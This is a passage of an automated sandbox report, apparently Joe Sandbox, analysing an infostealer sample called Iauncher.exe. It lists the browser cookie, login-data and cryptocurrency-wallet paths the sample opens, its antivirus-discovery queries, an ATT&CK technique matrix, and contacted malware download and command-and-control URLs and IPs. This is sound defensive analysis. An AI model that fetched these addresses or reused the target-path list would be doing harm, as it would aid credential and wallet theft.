                          Source: C:\Users\user\Desktop\Iauncher.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                          Source: C:\Users\user\Desktop\Iauncher.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                          Source: C:\Users\user\Desktop\Iauncher.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
                          Source: C:\Users\user\Desktop\Iauncher.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
                          Source: C:\Users\user\Desktop\Iauncher.exe; Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe; Code function: 11_2_00566C92 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,11_2_00566C92
                          Source: C:\Users\user\Desktop\Iauncher.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                          Source: RegAsm.exe, 0000000D.00000002.1443890601.0000000005630000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.1448635359.0000000006DA5000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

                          Stealing of Sensitive Information

                          Source: Yara match; File source: dump.pcap, type: PCAP
                          Source: Yara match; File source: 11.2.Iauncher.exe.590030.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara match; File source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara match; File source: 11.2.Iauncher.exe.590030.1.unpack, type: UNPACKEDPE
                          Source: Yara match; File source: 11.2.Iauncher.exe.560000.0.unpack, type: UNPACKEDPE
                          Source: Yara match; File source: 0000000D.00000002.1431945457.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match; File source: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmp, type: MEMORY
                          Source: Yara match; File source: Process Memory Space: Iauncher.exe PID: 7256, type: MEMORYSTR
                          Source: Yara match; File source: Process Memory Space: RegAsm.exe PID: 7324, type: MEMORYSTR
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Roaming\atomic\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Roaming\Binance\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Roaming\Exodus\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Roaming\Guarda\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
                          Source: Yara match; File source: 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match; File source: Process Memory Space: RegAsm.exe PID: 7324, type: MEMORYSTR

                          Remote Access Functionality

                          Source: Yara match; File source: dump.pcap, type: PCAP
                          Source: Yara match; File source: 11.2.Iauncher.exe.590030.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara match; File source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara match; File source: 11.2.Iauncher.exe.590030.1.unpack, type: UNPACKEDPE
                          Source: Yara match; File source: 11.2.Iauncher.exe.560000.0.unpack, type: UNPACKEDPE
                          Source: Yara match; File source: 0000000D.00000002.1431945457.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match; File source: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmp, type: MEMORY
                          Source: Yara match; File source: Process Memory Space: Iauncher.exe PID: 7256, type: MEMORYSTR
                          Source: Yara match; File source: Process Memory Space: RegAsm.exe PID: 7324, type: MEMORYSTR
                          Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                          Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 221 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | 1 OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                          Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 311 Process Injection | 1 Deobfuscate/Decode Files or Information | 1 Input Capture | 2 File and Directory Discovery | Remote Desktop Protocol | 2 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                          Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 4 Obfuscated Files or Information | Security Account Manager | 134 System Information Discovery | SMB/Windows Admin Shares | 1 Input Capture | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
                          Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Install Root Certificate | NTDS | 251 Security Software Discovery | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
                          Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 13 Software Packing | LSA Secrets | 1 Process Discovery | SSH | Keylogging | 13 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
                          Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Timestomp | Cached Domain Credentials | 241 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                          DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                          Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Masquerading | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                          Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 241 Virtualization/Sandbox Evasion | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                          IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 311 Process Injection | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
                          [Behavior graph: ID 1434866; Sample: Iauncher.exe; Start date: 01/05/2024; Architecture: WINDOWS; Score: 96]

                          Source | Detection | Scanner | Label | Link
                          Iauncher.exe | 24% | ReversingLabs | ByteCode-MSIL.Trojan.Zilla |
                          Iauncher.exe | 100% | Joe Sandbox ML | |
                          Source | Detection | Scanner | Label | Link
                          C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe | 100% | Joe Sandbox ML | |
                          No Antivirus matches
                          No Antivirus matches
                          Source | Detection | Scanner | Label | Link
Name | IP | Active | Malicious | Antivirus Detection | Reputation
antiloxss.usite.pro | 193.109.246.100 | true | false | | high
google.com | 172.253.122.101 | true | false | | high
gitgo.org | 172.67.202.98 | true | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://antiloxss.usite.pro/STLprograms/NEW/LM19AR/Gitgo2/BuildLink.txt | false | | high
https://antiloxss.usite.pro/STLprograms/NEW/hwid.txt | false | | high
https://antiloxss.usite.pro/STLprograms/NEW/LM19AR/Gitgo2/BuildZipName.txt | false | | high
https://gitgo.org/Iauncher.zip | false | Avira URL Cloud: safe | unknown
https://antiloxss.usite.pro/STLprograms/NEW/LM19AR/Gitgo2/BuildName.txt | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                                                                        high
                                                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/CancelRegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://tempuri.org/Entity/Id13RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          unknown
                                                                                                                                          http://tempuri.org/Entity/Id14RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          unknown
                                                                                                                                          http://tempuri.org/Entity/Id15RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          unknown
                                                                                                                                          http://tempuri.org/Entity/Id16RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          unknown
                                                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/NonceRegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://tempuri.org/Entity/Id17RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            unknown
                                                                                                                                            http://tempuri.org/Entity/Id18RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            unknown
                                                                                                                                            http://tempuri.org/Entity/Id5ResponseRegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            unknown
                                                                                                                                            http://tempuri.org/Entity/Id19RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            unknown
                                                                                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnsRegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://tempuri.org/Entity/Id10ResponseRegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              http://gitgo.orgdIauncher.exe, 00000000.00000002.3676644672.0000000002C31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/RenewRegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
147.45.47.65 | unknown | Russian Federation | 2895 | FREE-NET-ASFREEnetEU | true
193.109.246.100 | antiloxss.usite.pro | Virgin Islands (BRITISH) | 204343 | COMPUBYTE-ASRU | false
172.67.202.98 | gitgo.org | United States | 13335 | CLOUDFLARENETUS | false
172.253.122.101 | google.com | United States | 15169 | GOOGLEUS | false
Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1434866
Start date and time:2024-05-01 20:34:53 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 9m 34s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:23
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:Iauncher.exe
Detection:MAL
Classification:mal96.troj.spyw.evad.winEXE@6/7@3/4
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 231
• Number of non-executed functions: 68
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Not all processes where analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• VT rate limit hit for: Iauncher.exe
Time | Type | Description
20:35:43 | API Interceptor | 8751389x Sleep call for process: Iauncher.exe modified
20:36:01 | API Interceptor | 17x Sleep call for process: RegAsm.exe modified
                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                193.109.246.100Undetections.exeGet hashmaliciousVidarBrowse
                                                                                                                                                  No context
                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                  COMPUBYTE-ASRUUndetections.exeGet hashmaliciousVidarBrowse
                                                                                                                                                  • 193.109.246.100
                                                                                                                                                  T4IoJqcAwY.exeGet hashmaliciousNymaim, SmokeLoader, Zealer Stealer, onlyLoggerBrowse
                                                                                                                                                  • 193.109.246.62
                                                                                                                                                  https://www.minstroy.saratov.gov.ru/communication/blog/admin-blg/1.php?pagen=12Get hashmaliciousUnknownBrowse
                                                                                                                                                  • 193.109.247.233
                                                                                                                                                  njw.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 193.109.247.229
                                                                                                                                                  CLOUDFLARENETUStZvjMg3Hw9.exeGet hashmaliciousPureLog Stealer, RedLine, RisePro Stealer, Vidar, zgRATBrowse
                                                                                                                                                  • 172.67.151.19
                                                                                                                                                  Sean Eichler.htmGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 104.16.117.116
                                                                                                                                                  https://www.canva.com/design/DAGEAa4PcvI/o5lifZGBI-4kJErApUzUSw/view?utm_content=DAGEAa4PcvI&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 104.16.103.112
                                                                                                                                                  [V2]launcher.exeGet hashmaliciousPureLog Stealer, RedLine, XmrigBrowse
                                                                                                                                                  • 104.21.73.118
                                                                                                                                                  https://www.canva.com/design/DAGEAa4PcvI/o5lifZGBI-4kJErApUzUSw/view?utm_content=DAGEAa4PcvI&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                  • 104.17.2.184
                                                                                                                                                  https://2625819278.org/MIg2p2Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                  • 104.17.25.14
                                                                                                                                                  https://2625819278.org/MIg2p2Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                  • 104.17.2.184
                                                                                                                                                  https://acrobat.adobe.com/id/urn:aaid:sc:VA6C2:c2e8c3b1-63be-4a97-a3b9-a21649a6fcffGet hashmaliciousRemcosBrowse
                                                                                                                                                  • 172.66.0.163
                                                                                                                                                  https://2625819278.org/MIg2p2Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                  • 104.17.25.14
                                                                                                                                                  https://info.allproscales.com/e/1068402/v8lfjdMKG7A---MRecipient-Email/zkryx/856161333/h/wDvG5Cmj_LiS5vXP0t8exJUISMeCcNnbTO0v8uSzUVkGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                  • 104.17.2.184
                                                                                                                                                  FREE-NET-ASFREEnetEUtZvjMg3Hw9.exeGet hashmaliciousPureLog Stealer, RedLine, RisePro Stealer, Vidar, zgRATBrowse
                                                                                                                                                  • 193.233.132.226
                                                                                                                                                  2zdult23rz.exeGet hashmaliciousRisePro StealerBrowse
                                                                                                                                                  • 147.45.47.93
                                                                                                                                                  file.exeGet hashmaliciousRisePro StealerBrowse
                                                                                                                                                  • 147.45.47.93
                                                                                                                                                  file.exeGet hashmaliciousClipboard Hijacker, RisePro StealerBrowse
                                                                                                                                                  • 193.233.132.175
                                                                                                                                                  fBirvIlaOJ.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                  • 147.45.47.36
                                                                                                                                                  VOrqSh1Fts.exeGet hashmaliciousNeoreklami, PureLog StealerBrowse
                                                                                                                                                  • 193.233.132.234
                                                                                                                                                  WlCIinu0yp.exeGet hashmaliciousLummaC Stealer, PureLog Stealer, RedLine, RisePro Stealer, Socks5Systemz, Vidar, zgRATBrowse
                                                                                                                                                  • 147.45.47.93
                                                                                                                                                  file.exeGet hashmaliciousClipboard Hijacker, RisePro StealerBrowse
                                                                                                                                                  • 193.233.132.47
                                                                                                                                                  file.exeGet hashmaliciousLummaC, GCleaner, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLineBrowse
                                                                                                                                                  • 147.45.47.93
                                                                                                                                                  http://147.45.47.87Get hashmaliciousUnknownBrowse
                                                                                                                                                  • 147.45.47.87
Match: 3b5074b1b5d032e5620f69f9f700ff0e
Associated Sample Name / URL | Detection | Threat Name | Context
Luminar_v4.0.1.hta | malicious | Cobalt Strike, Atlantida Stealer | 172.67.202.98, 193.109.246.100
[V2]launcher.exe | malicious | PureLog Stealer, RedLine, Xmrig | 172.67.202.98, 193.109.246.100
Hola-Browser-Setup-C-Mmd1.exe | malicious | PureLog Stealer, SilentXMRMiner, Xmrig | 172.67.202.98, 193.109.246.100
0ED4nPDjeo.exe | malicious | RedLine, SectopRAT | 172.67.202.98, 193.109.246.100
Dy4Oz8C1yF.exe | malicious | Quasar | 172.67.202.98, 193.109.246.100
KG8KxoD6n4.exe | malicious | Quasar | 172.67.202.98, 193.109.246.100
twkBksZzkc.exe | malicious | Quasar | 172.67.202.98, 193.109.246.100
Agreement.docx | malicious | Unknown | 172.67.202.98, 193.109.246.100
uF8wwjO0iU.exe | malicious | AgentTesla, PureLog Stealer | 172.67.202.98, 193.109.246.100
Price List MAYQTRA031244PDF.scr.exe | malicious | AgentTesla, PureLog Stealer | 172.67.202.98, 193.109.246.100
                                                                                                                                                  No context
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:41 2023, mtime=Thu Oct 5 06:54:36 2023, atime=Wed Sep 27 08:36:54 2023, length=3242272, window=hide
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2104
                                                                                                                                                  Entropy (8bit):3.481108946577087
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:8SR7dvTgtI0lRYrnvPdAKRkdAGdAKRFdAKRr:8SLcq7
                                                                                                                                                  MD5:8C876C6FF585E5C109E7FD29485E53CC
                                                                                                                                                  SHA1:F2043B06F324B7E120EBF745304FD92AD39F17FD
                                                                                                                                                  SHA-256:E03324A5760227306BEBDFD7A58D1CE895463F42BF95A16A8725A6D82FE656B0
                                                                                                                                                  SHA-512:485F5A2FB4D83879C71560A38A050C9AA1D57D6CA56C4AA0A20A514820337CAA1B404258B067DAFA741281A15E98D9D5C5671C4A76B1792DB2CA78CA36F27CAE
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
Preview: binary shortcut data; readable strings: Program Files, @shell32.dll,-21781, Google, Chrome, Application, chrome.exe; target C:\Program Files\Google\Chrome\Application\chrome.exe; description "Access the Internet"; relative path ..\..\..\Program Files\Google\Chrome\Application\chrome.exe; working directory C:\Program Files\Google\Chrome\Application; command-line arguments beginning --proxy-server (preview ends here)
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):3274
                                                                                                                                                  Entropy (8bit):5.3318368586986695
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:Pq5qHwCYqh3oPtI6eqzxP0aymRLKTqdqlq7qqjqcEZ5D:Pq5qHwCYqh3qtI6eqzxP0at9KTqdqlqY
                                                                                                                                                  MD5:0B2E58EF6402AD69025B36C36D16B67F
                                                                                                                                                  SHA1:5ECC642327EF5E6A54B7918A4BD7B46A512BF926
                                                                                                                                                  SHA-256:4B0FB8EECEAD6C835CED9E06F47D9021C2BCDB196F2D60A96FEE09391752C2D7
                                                                                                                                                  SHA-512:1464106CEC5E264F8CEA7B7FF03C887DA5192A976FBC9369FC60A480A7B9DB0ED1956EFCE6FFAD2E40A790BD51FD27BB037256964BC7B4B2DA6D4D5C6B267FA1
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:moderate, very likely benign file
